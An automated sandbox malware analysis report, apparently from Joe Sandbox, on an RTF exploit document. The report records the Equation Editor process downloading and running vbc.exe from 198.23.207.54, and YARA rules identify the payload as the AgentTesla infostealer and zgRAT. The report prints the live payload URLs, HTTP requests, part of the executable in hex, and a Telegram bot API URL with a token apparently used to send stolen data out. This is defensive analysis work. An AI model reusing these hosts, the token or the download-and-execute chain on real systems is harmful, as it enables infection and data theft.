Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80

Networking
barindex
Yara detected Generic Downloader
Source: Yara match File source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Aug 2022 14:36:14 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6Last-Modified: Tue, 19 Jul 2022 05:10:31 GMTETag: "cd000-5e42180eec4e9"Accept-Ranges: bytesContent-Length: 839680Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f 5d 9e ba 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 c8 0c 00 00 06 00 00 00 00 00 00 9a e6 0c 00 00 20 00 00 00 00 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 e6 0c 00 4f 00 00 00 00 00 0d 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 2c e6 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 c6 0c 00 00 20 00 00 00 c8 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 03 00 00 00 00 0d 00 00 04 00 00 00 ca 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 ce 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c e6 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 70 5c 00 00 c4 58 00 00 03 00 00 00 37 00 00 06 34 b5 00 00 f8 30 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 02 14 7d 01 00 00 04 02 28 15 00 00 0a 00 00 02 28 09 00 00 06 00 2a 1b 30 03 00 d1 00 00 00 01 00 00 11 00 03 8c 01 00 00 1b 14 fe 03 0a 06 39 bf 00 00 00 00 02 7b 02 00 00 04 6f 16 00 00 0a 6f 17 00 00 0a 73 18 00 00 0a 0b 00 02 7b 02 00 00 04 6f 16 00 00 0a 6f 19 00 00 0a 0c 2b 5d 08 6f 1a 00 00 0a 74 16 00 00 01 0d 00 0f 01 fe 16 01 00 00 1b 6f 1b 00 00 0a 09 6f 1c 00 00 0a 6f 1d 00 00 0a 6f 1e 00 00 0a 13 04 11 04 14 28 1f 00 00 0a 13 06 11 06 2c 14 00 11 04 03 8c 01 00 00 1b 14 6f 20 00 00 0a 13 05 00 2b 05 00 14 13 05 00 07 11 05 6f 21 00 00 0a 00 00 08 6f 22 00 00 0a 2d 9b de 15 08 75 18 00 00 01 13 07 11 07 2c 08 11 07 6f 23 00 00 0a 00 dc 02 7b 02 00 00 04 6f 24 00 00 0a 07 6f 25 00 00 0a 6f 26 00 00 0a 26 00 2a 00 00 00 01 10 00 00 02 00 3a 00 69 a3 00 15 00 00 00 00 13 30 02 00 32 00 00 00 02 00 00 11 00 02 7b 02 00 00 04 6f 27 00 00 0a 6f 17 00 00 0a 16 30 03
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /shp/doc_200.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 198.23.207.54Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /200/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.207.54Connection: Keep-Alive
Contains functionality to download and execute PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036406B9 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_036406B9
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: EQNEDT32.EXE, 00000009.00000002.942059821.000000000097F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com= equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000009.00000002.942059821.000000000097F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000009.00000002.941922174.000000000091F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.23.207.54/200/vbc.exe
Source: EQNEDT32.EXE, 00000009.00000002.941922174.000000000091F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.23.207.54/200/vbc.exehhC:
Source: EQNEDT32.EXE, 00000009.00000002.942263460.0000000003640000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://198.23.207.54/200/vbc.exej
Source: shp on 198.23.207.54.url.0.dr String found in binary or memory: http://198.23.207.54/shp/
Source: doc_200.doc.url.0.dr String found in binary or memory: http://198.23.207.54/shp/doc_200.doc
Source: vbc.exe, 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/
Source: vbc.exe, 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{ADD09414-4C0B-48D8-B1C9-FBE697880796}.tmp Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036406B9 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_036406B9
Source: global traffic HTTP traffic detected: GET /shp/doc_200.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 198.23.207.54Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /200/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.207.54Connection: Keep-Alive

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc_200[1].doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
